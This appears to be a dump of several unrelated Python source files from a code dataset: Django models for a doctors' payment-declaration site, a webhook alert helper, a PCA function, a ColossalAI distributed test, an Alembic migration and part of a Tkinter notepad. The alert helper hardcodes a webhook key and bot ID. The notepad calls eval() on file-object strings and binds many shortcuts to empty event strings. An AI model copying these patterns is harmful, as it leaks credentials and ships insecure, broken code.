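            successor = node    # candidate successor; try to get closer
            node = node.left
        else:
            node = node.right   # successor, if any, lies to the right
    return successor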
self.othermedicalbenefit_set.count() == 0,\n self.feebenefit_set.count() == 0,\n self.grantbenefit_set.count() == 0,\n not self.past_declarations,\n not self.other_declarations)\n return all(the_things)\n\n\nclass Benefit(models.Model):\n BAND_CHOICES = (\n (1, u'under \\u00a3100'),\n (2, u'\\u00a3100- \\u00a31000'),\n (3, u'\\u00a31000- \\u00a32000'),\n (4, u'\\u00a32000 - \\u00a35000'),\n (5, u'\\u00a35000 - \\u00a310000'),\n (6, u'\\u00a310000 - \\u00a350 000'),\n (7, u'\\u00a350000- \\u00a3100000'),\n (8, u'\\u00a3100000+'),\n )\n\n class Meta:\n abstract = True\n\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n declaration = models.ForeignKey(\n Declaration, blank=True, null=True,\n on_delete=models.SET_NULL\n )\n company = models.CharField(max_length=200)\n reason = models.CharField(max_length=200)\n band = models.IntegerField(choices=BAND_CHOICES)\n\n def to_dict(self):\n return dict(\n company=self.company,\n reason=self.reason,\n band=self.get_band_display()\n )\n\nclass PharmaBenefit(Benefit): pass\nclass OtherMedicalBenefit(Benefit): pass\nclass FeeBenefit(Benefit): pass\nclass GrantBenefit(Benefit): pass\n\ndef random_token(extra=None, hash_func=hashlib.sha256):\n if extra is None:\n extra = []\n bits = extra + [str(random.SystemRandom().getrandbits(512))]\n return hash_func(\"\".join(bits).encode('utf-8')).hexdigest()[:8]\n\ndef in_one_day():\n now = dt.datetime.now()\n then = now + dt.timedelta(days=1)\n return then\n\ndef in_two_weeks():\n now = dt.datetime.now()\n then = now + dt.timedelta(days=14)\n return then\n\n\nclass DeclarationLink(models.Model):\n email = models.EmailField(unique=True)\n expires = models.DateTimeField(default=in_two_weeks)\n key = models.CharField(max_length=64, unique=True, default=random_token)\n\n @property\n def expired(self):\n \"\"\"\n Has this link expired already?\n \"\"\"\n return self.expires < timezone.now()\n\n def expire_tomorrow(self):\n \"\"\"\n Update the expires date to be tomorrow.\n \"\"\"\n self.expires = in_one_day()\n self.save()\n\n def absolute_url(self):\n return 'http://{0}/declare/{1}'.format(settings.DEFAULT_DOMAIN, self.key)\n\n def send(self):\n \"\"\"\n Send the link to this email.\n \"\"\"\n if settings.DEBUG:\n print(\"=\" * 20)\n print(self.absolute_url())\n print(\"=\" * 20)\n else:\n send_mail.send_mail(\n to_emails=[self.email],\n subject='Sunshine UK - Edit your public record',\n template=\"email/edit_public_record.html\",\n template_context={\n \"link\": self,\n }\n )\n\n def new_key(self):\n self.key = random_token()[:8]\n self.save()\n return\n\n\nclass WorkDetails(models.Model):\n CAREER_CHOICES = (\n (\"Academic\", \"Academic\"),\n (\"NHS\", \"NHS\"),\n (\"Private clinical work\", \"Private clinical work\")\n )\n dt_created = models.DateTimeField(auto_now_add=True)\n declaration = models.ForeignKey(\n \"DetailedDeclaration\", on_delete=models.CASCADE\n )\n category = models.CharField(\n verbose_name=\"Position type\",\n choices=CAREER_CHOICES,\n max_length=256\n )\n institution = models.CharField(max_length=200, blank=True, null=True)\n job_title = models.CharField(max_length=200, blank=True, null=True)\n\n\nclass DetailedDeclaration(models.Model):\n BAND_CHOICES = (\n (\n u'under \\u00a3100',\n u'under \\u00a3100'\n ),\n (\n u'\\u00a3100- \\u00a31000',\n u'\\u00a3100- \\u00a31000'\n ),\n (\n u'\\u00a31000- \\u00a32000',\n u'\\u00a31000- \\u00a32000'\n ),\n (\n u'\\u00a32000 - \\u00a35000',\n u'\\u00a32000 - \\u00a35000'\n ),\n (\n u'\\u00a35000 - \\u00a310000',\n u'\\u00a35000 - 
\\u00a310000'\n ),\n (\n u'\\u00a310000 - \\u00a350 000',\n u'\\u00a310000 - \\u00a350 000'\n ),\n (\n u'\\u00a350000- \\u00a3100000',\n u'\\u00a350000- \\u00a3100000'\n ),\n (\n u'\\u00a3100000+',\n u'\\u00a3100000+'\n )\n )\n\n dt_created = models.DateTimeField(auto_now_add=True)\n doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)\n for_year = models.IntegerField()\n nothing_to_declare = models.BooleanField(default=False)\n\n class Meta:\n ordering = [\"-for_year\", \"-dt_created\"]\n\n # Consultancy categories\n consultancy = models.BooleanField(default=False)\n consultancy_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n pharmaceutical_companies = models.BooleanField(default=False)\n technology_companies = models.BooleanField(default=False)\n consultancy_other = models.BooleanField(\n default=False, verbose_name=\"other\"\n )\n consultancy_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Academic categories\n academic = models.BooleanField(\n default=False,\n verbose_name=\"academic_relationships\"\n )\n academic_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n research_grants = models.BooleanField(default=False)\n academic_other = models.BooleanField(default=False)\n academic_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Other work categories\n other_work = models.BooleanField(default=False)\n other_work_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n public_relations = models.BooleanField(default=False)\n commercial_relationships = models.BooleanField(default=False)\n media = models.BooleanField(default=False)\n other_work_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Financial categories\n financial = models.BooleanField(default=False)\n financial_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n patents_owned = models.BooleanField(\n default=False, verbose_name=\"patents owned/part owned\"\n )\n shares = models.BooleanField(\n default=False, verbose_name=\"shares/stocks/company ownership\"\n )\n financial_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Spousal/family\n spousal = models.BooleanField(\n default=False, verbose_name=\"spousal/family\"\n )\n spousal_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n spousal_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # Sponsored/educational events\n sponsored = models.BooleanField(\n default=False,\n verbose_name=\"sponsored/educational events\"\n )\n sponsored_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n conferences = models.BooleanField(\n default=False\n )\n meals = models.BooleanField(\n default=False,\n verbose_name=\"meals/hospitality/travel\"\n )\n sponsored_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n # political affiliations\n political = models.BooleanField(\n default=False,\n verbose_name=\"political/membership organisations of note\"\n )\n political_band = models.CharField(\n choices=BAND_CHOICES,\n max_length=256,\n blank=True,\n null=True,\n verbose_name=\"Band\",\n )\n 
political_details = models.TextField(\n blank=True,\n verbose_name=\"details\"\n )\n\n def get_absolute_url(self):\n return reverse('doctor-detail', kwargs={'pk': self.doctor.pk})\n","repo_name":"openhealthcare/whopaysthisdoctor.org","sub_path":"doctors/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26939799370","text":"import requests\nfrom pprint import pformat\n\n\ndef send_qiyeweixin(content):\n url = \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=fc8f03cc-f81c-4269-bfda-c976c1d770ff\"\n headers = {'content-type': 'application/json'}\n data = {\"msgtype\": \"text\",\n \"text\": {\"content\": str(pformat(content))}}\n requests.post(url, json=data, headers=headers)\n\n\ndef send_tv(content):\n url = \"https://tv-service-alert.kuainiu.chat/alert\"\n headers = {'content-type': 'application/json'}\n data = {\"botId\": \"043be9e1-d720-4186-b5aa-debf1ee238d3\",\n \"message\": str(content)}\n requests.post(url, json=data, headers=headers)\n\n\nif __name__ == \"__main__\":\n # send_qiyeweixin(\"test\\ntest\")\n send_tv(\"test\\ntest\")\n # send_qiyeweixin([\"11111111111\", \"111erfdgfefer ferf erf e 2\", \"erwer wer wef we we w wev wevfwevwevewv3\"])\n","repo_name":"xiujingyuan/jc-mock","sub_path":"app/tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29816708800","text":"import numpy as np\n\ndef PCA(X: np.ndarray, threshold: float = None, num_dim: int = None) -> np.ndarray:\n \"\"\"\n Uses Principal Component Analysis to reduce dimensionality of dataset X usually either\n a threshold variance OR the number of dimensions.\n X: The dataset to be transformed, rows being datapoints and columns are features\n threshold: The explained variance [0,1] that is retained in the reduced dimensions.\n ex. 0.95 will return a reduced dataset where the eigenvectors still account for at\n least 95% of the variance in the data. 
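Two details in the Sunshine UK models.py record above are worth flagging. `DeclarationLink.expired` compares `self.expires` against `timezone.now()`, yet the `in_two_weeks`/`in_one_day` defaults are built from naive `dt.datetime.now()`; with `USE_TZ = True` that naive-vs-aware comparison raises `TypeError`. And `random_token` hand-rolls entropy through `random.SystemRandom` plus a SHA-256 digest, where the stdlib `secrets` module is the usual tool. A small sketch of both alternatives (function bodies are ours, not the project's):

import datetime as dt
import secrets

from django.utils import timezone

def in_two_weeks():
    # timezone.now() is timezone-aware when USE_TZ = True, so the later
    # comparison against timezone.now() in `expired` stays valid.
    return timezone.now() + dt.timedelta(days=14)

def random_token(length=8):
    # Cryptographically strong and one line; token_hex(n) yields 2n hex chars.
    return secrets.token_hex(length // 2)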
\n num_dim: The number of dimensions to reduce X into.\n \"\"\"\n if threshold is None and num_dim is None:\n raise TypeError(\"Must specify a variance threshold or the number of dimensions.\")\n if threshold is not None and num_dim is not None:\n raise TypeError(\"Cannot specify both a variance threshold and number of dimensions.\")\n # Mean-centers the data\n X_centered = X - X.mean(axis = 0)\n # Gets the covariance matrix\n X_cov = np.cov(X_centered, rowvar=False)\n # eigh works faster for symmetric matrices\n eig_values, eig_vectors = np.linalg.eigh(X_cov)\n\n # The values are already sorted in ascending order, needs to be descending\n eig_values = eig_values[::-1]\n eig_vectors = eig_vectors[:,::-1]\n\n # Threshold\n if threshold is not None:\n new_dim = 0\n sum_eigv = np.sum(eig_values)\n # Gets the explained variance\n explained_variances = list(map(lambda x: x / sum_eigv, eig_values))\n th = 0\n for i in range(len(eig_values)):\n th += explained_variances[i]\n if th >= threshold:\n new_dim = i+1\n break\n # Given number of dimensions\n else:\n new_dim = num_dim\n\n # Reduces the eigenvectors\n reduced_eig_vectors = eig_vectors[:,:new_dim]\n # Calculates the reduced dataset\n X_reduced = (reduced_eig_vectors.T @ X_centered.T).T\n\n return X_reduced\n\nif __name__ == '__main__':\n import pandas as pd\n\n # Reads the iris dataset\n df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n # Gets the pure data and converts to numpy array\n df_np = df.iloc[:,0:4].to_numpy()\n\n # Performs PCA\n reduced_df_np = PCA(df_np, threshold=0.95)\n #reduced_df_np = PCA(df_np, num_dim=2)\n\n print('New dimension count: {}'.format(reduced_df_np.shape[1]))\n\n \n\n","repo_name":"mclaager/ML-Algorithms","sub_path":"utils/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40700416361","text":"from functools import partial\n\nimport pytest\nimport torch\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.testing import assert_close\n\nimport colossalai\nfrom colossalai.tensor import ProcessGroup\nfrom colossalai.testing import parameterize, rerun_if_address_is_in_use\nfrom colossalai.utils import free_port, get_current_device\nfrom colossalai.utils.model.colo_init_context import ColoInitContext\nfrom colossalai.zero import LowLevelZeroOptimizer\nfrom tests.test_tensor.common_utils import set_seed, split_param_col_tp1d, split_param_row_tp1d, tensor_shard_equal\n\n\ndef strict_shard_equal(tensor, shard, tp_pg, rtol=1e-3, atol=1e-4):\n return tensor_shard_equal(tensor, shard, tp_pg.tp_local_rank(), tp_pg.tp_world_size(), rtol, atol)\n\n\nclass MlpModel(nn.Module):\n\n def __init__(self):\n super(MlpModel, self).__init__()\n self.linear1 = nn.Linear(32, 128)\n self.act = nn.GELU()\n self.linear2 = nn.Linear(128, 32)\n\n def forward(self, x):\n y = self.linear1(x)\n y = self.act(y)\n y = self.linear2(y)\n return x + y\n\n\n@parameterize(\"overlap_flag\", [False, True])\n@parameterize(\"partition_flag\", [False, True])\ndef exam_zero_with_tp(overlap_flag, partition_flag):\n set_seed(233010)\n tp_pg = ProcessGroup(tp_degree=2)\n\n with ColoInitContext(device=get_current_device(), default_pg=tp_pg):\n hybrid_model = MlpModel()\n torch_model = MlpModel().cuda()\n for pt, ph in zip(torch_model.parameters(), hybrid_model.parameters()):\n pt.data.copy_(ph.data)\n\n for 
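The threshold scan in the pca.py record above walks the eigenvalues one by one. Since the cumulative explained-variance ratio is monotone, the same dimension count falls out of `np.cumsum` plus `np.searchsorted`; a sketch (assuming, as inside `PCA`, that `eig_values` is already sorted in descending order and the threshold lies in [0, 1]):

import numpy as np

def dims_for_threshold(eig_values, threshold):
    """Smallest k whose top-k eigenvalues explain >= threshold of the variance."""
    ratios = np.cumsum(eig_values) / np.sum(eig_values)   # monotone in k
    return int(np.searchsorted(ratios, threshold) + 1)

# [4, 2, 1, 1] explains [0.5, 0.75, 0.875, 1.0] cumulatively:
print(dims_for_threshold(np.array([4.0, 2.0, 1.0, 1.0]), 0.75))  # -> 2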
name, param in hybrid_model.named_parameters():\n if 'linear1' in name:\n split_param_row_tp1d(param, tp_pg)\n param.compute_spec.set_output_replicate(False)\n if 'linear2.weight' in name:\n split_param_col_tp1d(param, tp_pg)\n\n torch_model = DDP(torch_model, device_ids=[tp_pg.rank()], process_group=tp_pg.dp_process_group())\n torch_optim = torch.optim.Adam(torch_model.parameters(), lr=1e-2) # set to 1e-2 for torch-1.11\n hybrid_optim = torch.optim.Adam(hybrid_model.parameters(), lr=1e-2)\n hybrid_optim = LowLevelZeroOptimizer(hybrid_optim,\n initial_scale=2,\n clip_grad_norm=1.0,\n overlap_communication=overlap_flag,\n partition_grad=partition_flag)\n\n dp_local_rank = tp_pg.dp_local_rank()\n set_seed(255 + dp_local_rank)\n\n data = torch.randn(8, 32, device=get_current_device())\n torch_loss = torch_model(data).sum()\n hybrid_loss = hybrid_model(data).sum()\n assert_close(torch_loss, hybrid_loss)\n\n torch_loss.backward()\n torch.nn.utils.clip_grad_norm_(torch_model.parameters(), 1.0)\n hybrid_optim.backward(hybrid_loss)\n\n torch_optim.step()\n hybrid_optim.step()\n\n for (name, pt), ph in zip(torch_model.named_parameters(), hybrid_model.parameters()):\n assert strict_shard_equal(pt.data, ph.data, tp_pg)\n\n\ndef run_dist(rank, world_size, port):\n colossalai.launch(config={}, rank=rank, world_size=world_size, port=port, host='localhost')\n exam_zero_with_tp()\n\n\n@pytest.mark.dist\n@rerun_if_address_is_in_use()\ndef test_zero_with_tp():\n world_size = 4\n run_func = partial(run_dist, world_size=world_size, port=free_port())\n mp.spawn(run_func, nprocs=world_size)\n\n\nif __name__ == '__main__':\n test_zero_with_tp()\n","repo_name":"Wenlinhan/ColossalAI","sub_path":"tests/test_zero/low_level_zero/test_zero_tp.py","file_name":"test_zero_tp.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41008211700","text":"\"\"\"empty message\n\nRevision ID: 5d8bb7ea5b77\nRevises: 04690bb949a2\nCreate Date: 2020-01-26 18:14:09.493805\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '5d8bb7ea5b77'\ndown_revision = '04690bb949a2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=80), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('username')\n )\n op.drop_index('email', table_name='person')\n op.drop_index('username', table_name='person')\n op.drop_table('person')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
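The sharding choice in the ZeRO/TP test above is not arbitrary: `linear1` is split along its output rows and `linear2.weight` along the matching input columns, so the element-wise GELU between them runs on each rank's local slice and a single reduction at the end recovers the full output (which is why `set_output_replicate(False)` is safe in between). A bias-free, single-process toy check of that identity, with shapes following `MlpModel` (variable names are ours):

import torch
import torch.nn.functional as F

torch.manual_seed(0)
x = torch.randn(32)
w1 = torch.randn(128, 32)    # linear1.weight: hidden dim 128, split by rows
w2 = torch.randn(32, 128)    # linear2.weight: same dim, split by columns

full = w2 @ F.gelu(w1 @ x)

partial = torch.zeros(32)
for rank in range(2):                               # two TP "ranks"
    rows = slice(rank * 64, (rank + 1) * 64)
    partial += w2[:, rows] @ F.gelu(w1[rows] @ x)   # purely local math

assert torch.allclose(full, partial, atol=1e-5)     # one all-reduce suffices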
###\n op.create_table('person',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('username', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_index('username', 'person', ['username'], unique=True)\n op.create_index('email', 'person', ['email'], unique=True)\n op.drop_table('projects')\n # ### end Alembic commands ###\n","repo_name":"jhcxavier/Back-End-PersPage","sub_path":"migrations/versions/5d8bb7ea5b77_.py","file_name":"5d8bb7ea5b77_.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73723714666","text":"from tkinter import *\r\nfrom tkinter.messagebox import _show,askyesnocancel\r\nfrom tkinter import font,filedialog,ttk\r\nfrom os import system, startfile\r\nfrom sys import exit\r\nfrom sqlite3 import connect\r\n\r\nclass My_Note(Tk):\r\n # Variables\r\n issaved = False\r\n file_path = 'New Note'\r\n file_name = 'New Note'\r\n Bold = Italic = Underline = Wrap = Status = None\r\n\r\n # Initializing all class variables\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # Checkbuttons\r\n self.Bold = IntVar(self)\r\n self.Italic = IntVar(self)\r\n self.Underline = IntVar(self)\r\n self.Wrap = IntVar(self,value=1)\r\n self.Status = StringVar(self,value='Ready')\r\n\r\n # For Font_Selection\r\n self.set_font_selector()\r\n\r\n # For Find, Replace\r\n self.startindex = '1.0'\r\n self.found=False\r\n self.exact=False\r\n self.nocase=True\r\n self.find_next_press = False\r\n\r\n # Setting Window height,width\r\n def window_set(self, width, height, minwidth, minheight):\r\n self.geometry(f'{width}x{height}')\r\n self.minsize(minwidth, minheight)\r\n self.iconbitmap('Mynote_img.ico')\r\n self.title_set()\r\n\r\n # Setting Window Title\r\n def title_set(self):\r\n if self.file_path == 'New Note':\r\n tag = ''\r\n elif self.issaved:\r\n tag = '(Saved)'\r\n else:\r\n tag = '(Not Saved)'\r\n self.title(f'MyNote - {self.file_path} {tag}')\r\n\r\n # Function for setting Scrollbar and Text Widget\r\n def Text_widget_and_scrollbar(self):\r\n self.pad = Text(self, font=self.main_font, wrap='word',undo=1,selectforeground='black',inactiveselectbackground='grey')\r\n scrolly = Scrollbar(self.pad,cursor='left_ptr')\r\n scrollx = Scrollbar(self.pad,orient=HORIZONTAL,cursor='left_ptr')\r\n self.pad.configure(yscrollcommand=scrolly.set,xscrollcommand=scrollx)\r\n\r\n scrolly.configure(command=self.pad.yview)\r\n scrollx.configure(command=self.pad.xview)\r\n\r\n scrolly.pack(side=RIGHT, fill=Y)\r\n scrollx.pack(side=BOTTOM, fill=X)\r\n self.pad.pack(fill=BOTH,expand=1)\r\n \r\n self.scrollers = (scrollx,scrolly)\r\n f1 = Frame(self,relief=RIDGE)\r\n f1.pack(side=BOTTOM,fill=X)\r\n\r\n status_widget = Label(f1,text=self.Status.get(), anchor='w')\r\n\r\n status_widget.pack(side=LEFT)\r\n\r\n line = Label(f1,text=f\"Line : {self.pad.index(INSERT).split('.')[0]} Char : {self.pad.index(INSERT).split('.')[1]}\",anchor='e')\r\n line.pack(side=RIGHT)\r\n return status_widget, line\r\n\r\n # Function for opening new a file\r\n def new_file(self):\r\n self.destroy()\r\n startfile('My_Note.py')\r\n\r\n # Function for saving a file\r\n def save_file(self):\r\n if not self.issaved and self.file_name=='New Note':\r\n name = filedialog.asksaveasfile(title='Save File', defaultext='.txt', 
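One caveat on the Alembic revision above: its `upgrade` drops `person` and creates `projects` from scratch, so any existing rows are lost on upgrade (and again on downgrade). If the intent were a rename rather than a replacement, `op.rename_table` would keep the data; a hypothetical sketch, not this project's actual revision:

from alembic import op

def upgrade():
    op.rename_table('person', 'projects')   # rows and indexes survive

def downgrade():
    op.rename_table('projects', 'person')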
initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[\r\n ('Text Files', '*.txt'), ('All files', '*.*')])\r\n if not name == None:\r\n self.file_path = eval(str(name).split('=')[1].replace(' mode',''))\r\n self.issaved = True\r\n with open(self.file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n \r\n self.file_name = self.file_path.split('/')[-1]\r\n # Saving data to database\r\n Db = Database(self.file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n else:\r\n self.issaved=True\r\n with open(self.file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n \r\n # Saving data to database\r\n Db = Database(self.file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n\r\n self.title_set()\r\n\r\n # Function for Sava As \r\n def save_as_file(self):\r\n name = filedialog.asksaveasfile(title='Save As File', defaultext='.txt', initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[\r\n ('Text Files', '*.txt'), ('All files', '*.*')])\r\n if not name == None:\r\n file_path = eval(str(name).split('=')[1].replace(' mode',''))\r\n file_name = file_path.split('/')[-1]\r\n with open(file_path, 'w') as f:\r\n f.write(self.pad.get(1.0, END))\r\n\r\n # Saving data to database\r\n Db = Database(file_name)\r\n Db.clear()\r\n for i in self.get_format():\r\n Db.Insert_data(i[0],i[1],i[2])\r\n\r\n # Function for opening a file\r\n def open_file(self):\r\n file = filedialog.askopenfile(\r\n title=\"Open File\", initialdir='%HOMEDRIVE%%HOMEPATH%', filetypes=[('Text Files', '*.txt'),('Python files','*.py'), ('All files', '*.*')])\r\n if not file == None:\r\n file_path = eval(str(file).split('=')[1].replace(' mode',''))\r\n file_name = file_path.split('/')[-1]\r\n with open(file_path) as f:\r\n My_Note_new = My_Note()\r\n My_Note_new.issaved = True\r\n My_Note_new.file_path = file_path\r\n My_Note_new.file_name = file_name\r\n\r\n def set_data():\r\n current_bold_font = My_Note_new.main_font.copy()\r\n current_bold_font.config(weight='bold')\r\n\r\n current_italic_font = My_Note_new.main_font.copy()\r\n current_italic_font.config(slant='italic')\r\n\r\n current_underline_font = My_Note_new.main_font.copy()\r\n current_underline_font.config(underline=1)\r\n\r\n current_overstrike_font = My_Note_new.main_font.copy()\r\n current_overstrike_font.config(overstrike=1)\r\n\r\n current_regular_font = My_Note_new.main_font.copy()\r\n\r\n Db = Database(file_name)\r\n for i in Db.Select_data():\r\n for j in ['bold','italic','underline','overstrike','regular']:\r\n if j!=i[2]:\r\n My_Note_new.pad.tag_remove(f'Format_{j}_text',i[0],i[1])\r\n else:\r\n My_Note_new.pad.tag_configure(f'Format_{i[2]}_text',font=eval(f'current_{i[2]}_font'))\r\n My_Note_new.pad.tag_add(f'Format_{i[2]}_text',i[0],i[1])\r\n \r\n main(My_Note_new, f.read(),set_data)\r\n \r\n def get_format(self):\r\n data_lst = []\r\n style = {'Format_bold_text':'bold','Format_italic_text':'italic','Format_underline_text':'underline','Format_overstrike_text':'overstrike'}\r\n for x in style:\r\n for i in range(0,len(self.pad.tag_ranges(x))-1,2):\r\n a = str(self.pad.tag_ranges(x)[i]).split('','')\r\n b = str(self.pad.tag_ranges(x)[i+1]).split('','')\r\n data_lst.append([a,b,style[x]])\r\n return data_lst\r\n\r\n # Important Function for opening a file\r\n def inserter(self, text=''):\r\n self.pad.insert(END, text)\r\n \r\n # For Shortcut for Bold,Italic,Underline\r\n def toggler(self,bold=False,underline=False,italic=False):\r\n if bold:\r\n if self.Bold.get() == 0:\r\n 
self.Bold.set(1)\r\n elif self.Bold.get() == 1:\r\n self.Bold.set(0)\r\n if italic:\r\n if self.Italic.get() == 0:\r\n self.Italic.set(1)\r\n elif self.Italic.get() == 1:\r\n self.Italic.set(0)\r\n if underline:\r\n if self.Underline.get() == 0:\r\n self.Underline.set(1)\r\n elif self.Underline.get() == 1:\r\n self.Underline.set(0)\r\n\r\n self.format()\r\n \r\n # For Font_Style Menu\r\n def format(self,font=False):\r\n\r\n bold = 'normal'\r\n underline = 0\r\n italic = 'roman'\r\n wrap_text = 'none'\r\n \r\n if not font:\r\n for i in [[self.Bold, 'bold'], [self.Italic, 'italic'], [self.Underline, 'underline'], [self.Wrap, 'word']]:\r\n if i[0].get() == 1:\r\n if i[1] == 'bold':\r\n bold = i[1]\r\n elif i[1] == 'italic':\r\n italic = i[1]\r\n elif i[1] == 'word':\r\n wrap_text = i[1]\r\n else:\r\n underline = 1\r\n self.pad_font.config(weight=bold, underline=underline, slant=italic)\r\n self.pad.configure(wrap=wrap_text)\r\n else:\r\n self.show_font()\r\n \r\n # To set regular_font\r\n def regular_setter(self):\r\n self.Bold.set(0)\r\n self.Italic.set(0)\r\n self.Underline.set(0)\r\n self.format()\r\n\r\n # For Font_Selection\r\n def set_font_selector(self):\r\n self.font_name = 'Times New Roman'\r\n self.font_size = 15\r\n\r\n self.pad_font = self.main_font = font.Font(self, family=self.font_name,size=self.font_size)\r\n self.fonts = list(map(str,font.families()))\r\n self.fonts.sort()\r\n\r\n # To change Font\r\n def selector(self,font_name,font_size):\r\n self.font_name = font_name.get()\r\n self.font_size = font_size.get()\r\n if self.font_name not in self.fonts:\r\n _show('Invalid format','Please select a valid Font name and size.')\r\n self.base.destroy()\r\n self.set_font_selector()\r\n self.format(font=True)\r\n return\r\n else:\r\n self.pad_font.configure(family=self.font_name,size=self.font_size)\r\n self.base.destroy()\r\n \r\n #To show font dialog\r\n def show_font(self):\r\n self.base = Tk()\r\n self.base.geometry('400x200')\r\n self.base.title('Select Font')\r\n self.base.iconbitmap('Mynote_img.ico')\r\n\r\n font_name = StringVar(self.base,value=self.font_name)\r\n font_size = StringVar(self.base,value=self.font_size)\r\n\r\n Label(self.base,text='Select Font',font=5).grid(padx=20)\r\n Lbx = ttk.Combobox(self.base,values=self.fonts,textvariable=font_name)\r\n Lbx.grid(padx=30)\r\n\r\n Label(self.base,text='Select Size',font=5).grid(column=1,row=0,pady=10)\r\n SizeBox = ttk.Combobox(self.base,values=[str(i+1) for i in range(99)],textvariable=font_size)\r\n SizeBox.grid(padx=20,column=1,row=1)\r\n\r\n Button(self.base,text='Apply',command=lambda : self.selector(font_name,font_size)).grid(columnspan=2,pady=70)\r\n\r\n self.base.mainloop()\r\n \r\n # Close app\r\n def onclose(self):\r\n if not self.issaved:\r\n if len(self.pad.get(1.0,END))<=1:\r\n self.destroy()\r\n else:\r\n ask = askyesnocancel('Warning','Do you want to save file ?')\r\n if ask==True:\r\n self.save_file()\r\n if self.issaved:\r\n self.destroy()\r\n elif ask==False:\r\n self.destroy()\r\n else:\r\n self.destroy()\r\n\r\n # Making shortcuts\r\n def configure_pad(self, status_widget):\r\n\r\n self.protocol('WM_DELETE_WINDOW',self.onclose)\r\n\r\n self.pad.bind('', func=lambda x: self.save_file())\r\n self.pad.bind('', func=lambda x: self.save_file())\r\n\r\n self.pad.bind('', func=lambda x: self.open_file())\r\n self.pad.bind('', func=lambda x: self.open_file())\r\n\r\n self.pad.bind('', func=lambda x: self.save_as_file())\r\n self.pad.bind('', func=lambda x: self.save_as_file())\r\n\r\n self.pad.bind('', 
func=lambda x: self.new_file())\r\n self.pad.bind('', func=lambda x: self.new_file())\r\n\r\n self.pad.bind('', func=lambda x: self.pad.edit_undo())\r\n self.pad.bind('', func=lambda x: self.pad.edit_undo())\r\n\r\n self.pad.bind('', func=lambda x: self.pad.edit_redo())\r\n self.pad.bind('', func=lambda x: self.pad.edit_redo())\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('find'))\r\n self.pad.bind('', func=lambda x: self.find_words('find'))\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('goto'))\r\n self.pad.bind('', func=lambda x: self.find_words('goto'))\r\n\r\n self.pad.bind('', func=lambda x: self.find_words('replace'))\r\n self.pad.bind('', func=lambda x: self.find_words('replace'))\r\n\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Working.....'))\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Ready'))\r\n\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Working.....'))\r\n self.pad.bind('', func=lambda x: self.status_bar_setter(\r\n status_widget, 'Ready'))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(bold=1))\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(bold=1))\r\n\r\n self.pad.bind(\r\n '', func=lambda x: self.toggler(italic=1))\r\n 